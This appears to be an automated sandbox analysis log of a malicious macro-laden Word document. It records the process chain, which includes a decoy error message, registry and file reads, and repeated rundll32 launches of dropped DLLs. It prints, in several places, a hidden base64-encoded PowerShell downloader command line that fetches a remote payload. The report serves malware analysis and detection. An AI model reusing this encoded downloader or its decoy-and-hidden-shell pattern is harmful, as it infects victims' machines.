Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....p.................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............Q..j....@J_...............X.............}..v....@.......0.......................r.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j......................X.............}..v....x.......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;....... .......Q..j....@J_...............X.............}..v............0................F_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j......................X.............}..v....@.......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................J.j....E.................X.............}..v......&.....0...............X._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................J.j....E.................X.............}..v.... R&.....0...............X._.............0...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1

Source: DAT.doc	Virustotal: Detection: 71%
Source: DAT.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp

Source: DAT.doc

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: DAT.doc	Stream path 'Macros/VBA/Dwztpwkmgv8q9o28r' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Dwztpwkmgv8q9o28r			Name: Dwztpwkmgv8q9o28r

PowerShell case anomaly found

